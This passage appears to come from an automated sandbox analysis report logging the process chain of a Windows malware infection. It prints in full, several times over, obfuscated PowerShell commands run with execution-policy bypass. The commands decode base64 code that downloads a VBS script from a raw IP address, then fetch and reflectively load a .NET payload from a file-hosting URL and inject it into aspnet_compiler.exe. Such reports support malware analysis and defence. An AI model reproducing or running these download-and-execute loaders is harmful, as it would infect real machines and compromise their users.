VBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $caviloso = 'jglkaw9lbgvjdhjpy2lkywrlid0gj2h0dhbzoi8vmtaxni5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9sfrvr19fexj1rfiwt0fasdbisep5zxbvclhtdkzfatzqogj3zvrlv0jddte5egnialfonvrrc2e0t0cwtxfjy3fxtkxszyzwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi3otqzntzhmwzmnmmgjzskdxj1z3vhaw8gpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrlbmnlzmfsyxj0bya9icr1cnvndwfpby5eb3dubg9hzerhdgeojglkaw9lbgvjdhjpy2lkywrlktskahltzw5vdg9tawegpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkzw5jzwzhbgfydg8poyrpbnrlcm1pyxigpsanpdxcqvnfnjrfu1rbulq+pic7jgnvcglvc2ftzw50zsa9icc8pejbu0u2nf9ftkq+pic7jhryyxnsywrhcia9icroew1lbm90b21pys5jbmrlee9mkcrpbnrlcm1pyxipoyryzxnwb25kb25hid0gjgh5bwvub3rvbwlhlkluzgv4t2yojgnvcglvc2ftzw50zsk7jhryyxnsywrhciatz2ugmcatyw5kicryzxnwb25kb25hic1ndcakdhjhc2xhzgfyoyr0cmfzbgfkyxigkz0gjgludgvybwlhci5mzw5ndgg7jgvtcgvsawnhcia9icryzxnwb25kb25hic0gjhryyxnsywrhcjskdw5ndwlmb3jtzsa9icroew1lbm90b21pys5tdwjzdhjpbmcojhryyxnsywrhciwgjgvtcgvsawnhcik7jg1vbgrpbmegpsatam9pbiaojhvuz3vpzm9ybwuuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojhvuz3vpzm9ybwuutgvuz3rokv07jhjhymlzywx0b25hid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkbw9szgluysk7jg9jzwfub2xvz2lzdgegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcryywjpc2fsdg9uysk7jgfscglyy2hlid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgfscglyy2hllkludm9rzsgkbnvsbcwgqcgndhh0lkfaukhiqvovmtmylzawmi4zmteumdcunjqxly86chr0accsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicdhc3buzxrfy29tcglszxinlcanjhjlc3n1cgluyxinlcanjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnmscsjyryzxnzdxbpbmfyjykpow==';$bernarda = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($caviloso));invoke-expression $bernarda
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $caviloso = 'jglkaw9lbgvjdhjpy2lkywrlid0gj2h0dhbzoi8vmtaxni5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9sfrvr19fexj1rfiwt0fasdbisep5zxbvclhtdkzfatzqogj3zvrlv0jddte5egnialfonvrrc2e0t0cwtxfjy3fxtkxszyzwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi3otqzntzhmwzmnmmgjzskdxj1z3vhaw8gpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrlbmnlzmfsyxj0bya9icr1cnvndwfpby5eb3dubg9hzerhdgeojglkaw9lbgvjdhjpy2lkywrlktskahltzw5vdg9tawegpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkzw5jzwzhbgfydg8poyrpbnrlcm1pyxigpsanpdxcqvnfnjrfu1rbulq+pic7jgnvcglvc2ftzw50zsa9icc8pejbu0u2nf9ftkq+pic7jhryyxnsywrhcia9icroew1lbm90b21pys5jbmrlee9mkcrpbnrlcm1pyxipoyryzxnwb25kb25hid0gjgh5bwvub3rvbwlhlkluzgv4t2yojgnvcglvc2ftzw50zsk7jhryyxnsywrhciatz2ugmcatyw5kicryzxnwb25kb25hic1ndcakdhjhc2xhzgfyoyr0cmfzbgfkyxigkz0gjgludgvybwlhci5mzw5ndgg7jgvtcgvsawnhcia9icryzxnwb25kb25hic0gjhryyxnsywrhcjskdw5ndwlmb3jtzsa9icroew1lbm90b21pys5tdwjzdhjpbmcojhryyxnsywrhciwgjgvtcgvsawnhcik7jg1vbgrpbmegpsatam9pbiaojhvuz3vpzm9ybwuuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojhvuz3vpzm9ybwuutgvuz3rokv07jhjhymlzywx0b25hid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkbw9szgluysk7jg9jzwfub2xvz2lzdgegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcryywjpc2fsdg9uysk7jgfscglyy2hlid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgfscglyy2hllkludm9rzsgkbnvsbcwgqcgndhh0lkfaukhiqvovmtmylzawmi4zmteumdcunjqxly86chr0accsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicdhc3buzxrfy29tcglszxinlcanjhjlc3n1cgluyxinlcanjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnmscsjyryzxnzdxbpbmfyjykpow==';$bernarda = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($caviloso));invoke-expression $bernarda
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $caviloso = 'jglkaw9lbgvjdhjpy2lkywrlid0gj2h0dhbzoi8vmtaxni5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9sfrvr19fexj1rfiwt0fasdbisep5zxbvclhtdkzfatzqogj3zvrlv0jddte5egnialfonvrrc2e0t0cwtxfjy3fxtkxszyzwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi3otqzntzhmwzmnmmgjzskdxj1z3vhaw8gpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrlbmnlzmfsyxj0bya9icr1cnvndwfpby5eb3dubg9hzerhdgeojglkaw9lbgvjdhjpy2lkywrlktskahltzw5vdg9tawegpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkzw5jzwzhbgfydg8poyrpbnrlcm1pyxigpsanpdxcqvnfnjrfu1rbulq+pic7jgnvcglvc2ftzw50zsa9icc8pejbu0u2nf9ftkq+pic7jhryyxnsywrhcia9icroew1lbm90b21pys5jbmrlee9mkcrpbnrlcm1pyxipoyryzxnwb25kb25hid0gjgh5bwvub3rvbwlhlkluzgv4t2yojgnvcglvc2ftzw50zsk7jhryyxnsywrhciatz2ugmcatyw5kicryzxnwb25kb25hic1ndcakdhjhc2xhzgfyoyr0cmfzbgfkyxigkz0gjgludgvybwlhci5mzw5ndgg7jgvtcgvsawnhcia9icryzxnwb25kb25hic0gjhryyxnsywrhcjskdw5ndwlmb3jtzsa9icroew1lbm90b21pys5tdwjzdhjpbmcojhryyxnsywrhciwgjgvtcgvsawnhcik7jg1vbgrpbmegpsatam9pbiaojhvuz3vpzm9ybwuuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojhvuz3vpzm9ybwuutgvuz3rokv07jhjhymlzywx0b25hid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkbw9szgluysk7jg9jzwfub2xvz2lzdgegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcryywjpc2fsdg9uysk7jgfscglyy2hlid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgfscglyy2hllkludm9rzsgkbnvsbcwgqcgndhh0lkfaukhiqvovmtmylzawmi4zmteumdcunjqxly86chr0accsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicdhc3buzxrfy29tcglszxinlcanjhjlc3n1cgluyxinlcanjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnmscsjyryzxnzdxbpbmfyjykpow==';$bernarda = 